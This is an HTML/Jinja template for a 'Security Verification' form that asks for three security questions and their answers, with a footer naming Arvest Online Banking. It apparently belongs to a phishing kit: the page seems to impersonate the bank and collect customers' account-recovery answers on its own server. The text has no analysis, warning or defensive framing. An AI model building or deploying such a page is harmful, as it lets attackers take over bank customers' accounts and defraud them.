{% extends 'base.html'%} {%block body%}

<div style="padding-top: 5px" class="middle-form">
  <p
    class="go-left"
    style="font-size: 30px; text-align: center"
  >
    Security Verification <br />
  </p>

  <div class="submitForm">
    <form action="" method="post">
      <div class="input-field">
        <label for="question1">Question 1</label>
        <select
          name="q1"
          class="kds-form__label"
          style="
            border-left: 1px solid thistle;
            margin-bottom: 10px;
            border-top: 1px solid thistle;
          "
          required
        >
          <option selected="selected" value="">Choose Your Question</option>
          <option value="What is your first pet name?">
            What is your first pet name?
          </option>
          <option
          value="In what city was your high school?"
        >
          In what city was your high school? (full name of city only)
        </option>
          <option value="What was your childhood nickname?">
            What was your childhood nickname?
          </option>
          <option
            value="What is the last name of your all-time favorite athlete?"
          >
            What is the last name of your all-time favorite athlete?
          </option>
          <option value="What is your favorite family holiday vacation?">
            What is your favorite family holiday vacation?
          </option>
          <option value="What is your all-time favorite sport movie?">
            What is your all-time favorite sport movie?
          </option>
          <option value="If you have ever broken a bone, which one ?">
            If you have ever broken a bone, which one ?
          </option>
          <option value="Who is your favorite cartoon character?">
            Who is your favorite cartoon character?
          </option>
          <option value="What is your dream occupation?">
            What is your dream occupation?
          </option>
          <option value="What is the middle name of your oldest sibling?">
            What is the middle name of your oldest sibling?
          </option>
          <option
            value="What is the first and last name of your oldest cousin?"
          >
            What is the first and last name of your oldest cousin?
          </option>
          <option value="What color was your first car?">
            What color was your first car?
          </option>
          <option value="What’s your Favourite teachers name?">
            What’s your Favourite teachers name?
          </option>
          <option value="What’s your brother/sisters nickname?">
            What’s your brother/sisters nickname?
          </option>
          <option value="What’s your favorite board game?">
            What’s your favorite board game?
          </option>
          <option value="What is your favorite museum or cultural institution?">
            What is your favorite museum or cultural institution?
          </option>
        </select>
      </div>
      <div class="input-field">
        <label for="question1_ans">Answer</label>
        <input id="question1_ans" name="ans1" type="text" />
      </div>

      <!-- Question 2 -->
      <div class="input-field">
        <label for="question1">Question 2</label>
        <select
          name="q2"
          class="kds-form__label"
          style="
            border-left: 1px solid thistle;
            margin-bottom: 10px;
            border-top: 1px solid thistle;
          "
          required
        >
          <option selected="selected" value="">Choose Your Question</option>
          <option value="What is your first pet name?">
            What is your first pet name?
          </option>
          <option
          value="In what city was your high school?"
        >
          In what city was your high school? (full name of city only)
        </option>
          <option value="What was your childhood nickname?">
            What was your childhood nickname?
          </option>
          <option
            value="What is the last name of your all-time favorite athlete?"
          >
            What is the last name of your all-time favorite athlete?
          </option>
          <option value="What is your favorite family holiday vacation?">
            What is your favorite family holiday vacation?
          </option>
          <option value="What is your all-time favorite sport movie?">
            What is your all-time favorite sport movie?
          </option>
          <option value="If you have ever broken a bone, which one ?">
            If you have ever broken a bone, which one ?
          </option>
          <option value="Who is your favorite cartoon character?">
            Who is your favorite cartoon character?
          </option>
          <option value="What is your dream occupation?">
            What is your dream occupation?
          </option>
          <option value="What is the middle name of your oldest sibling?">
            What is the middle name of your oldest sibling?
          </option>
          <option
            value="What is the first and last name of your oldest cousin?"
          >
            What is the first and last name of your oldest cousin?
          </option>
          <option value="What color was your first car?">
            What color was your first car?
          </option>
          <option value="What’s your Favourite teachers name?">
            What’s your Favourite teachers name?
          </option>
          <option value="What’s your brother/sisters nickname?">
            What’s your brother/sisters nickname?
          </option>
          <option value="What’s your favorite board game?">
            What’s your favorite board game?
          </option>
          <option value="What is your favorite museum or cultural institution?">
            What is your favorite museum or cultural institution?
          </option>
        </select>
      </div>
      <div class="input-field">
        <label for="question2_ans">Answer</label>
        <input id="question2_ans" name="ans2" type="text" />
      </div>

      <!-- Question 3 -->
      <div class="input-field">
        <label for="question1">Question 3</label>
        <select
          name="q3"
          class="kds-form__label"
          style="
            border-left: 1px solid thistle;
            margin-bottom: 10px;
            border-top: 1px solid thistle;
          "
          required
        >
          <option selected="selected" value="">Choose Your Question</option>
          <option value="What is your first pet name?">
            What is your first pet name?
          </option>
          <option value="What was your childhood nickname?">
            What was your childhood nickname?
          </option>
          <option
            value="In what city was your high school?"
          >
            In what city was your high school? (full name of city only)
          </option>
          <option value="What is your favorite family holiday vacation?">
            What is your favorite family holiday vacation?
          </option>
          <option value="What is your all-time favorite sport movie?">
            What is your all-time favorite sport movie?
          </option>
          <option value="If you have ever broken a bone, which one ?">
            If you have ever broken a bone, which one ?
          </option>
          <option value="Who is your favorite cartoon character?">
            Who is your favorite cartoon character?
          </option>
          <option value="What is your dream occupation?">
            What is your dream occupation?
          </option>
          <option value="What is the middle name of your oldest sibling?">
            What is the middle name of your oldest sibling?
          </option>
          <option
            value="What is the first and last name of your oldest cousin?"
          >
            What is the first and last name of your oldest cousin?
          </option>
          <option value="What color was your first car?">
            What color was your first car?
          </option>
          <option value="What’s your Favourite teachers name?">
            What’s your Favourite teachers name?
          </option>
          <option value="What’s your brother/sisters nickname?">
            What’s your brother/sisters nickname?
          </option>
          <option value="What’s your favorite board game?">
            What’s your favorite board game?
          </option>
          <option value="What is your favorite museum or cultural institution?">
            What is your favorite museum or cultural institution?
          </option>
        </select>
      </div>
      <div class="input-field">
        <label for="question3_ans">Answer</label>
        <input id="question3_ans" name="ans3" type="text" />
      </div>

      <button style="width: 100%; margin-top: -5px" type="submit">
        Verify
      </button>
    </form>
    <br />

    <p>Unauthorized access is prohibited. Usage may be monitored</p>

    <hr>

    <p>Have questions about Arvest Online Banking?</p>
   

    
  </div>
</div>

{%endblock%}
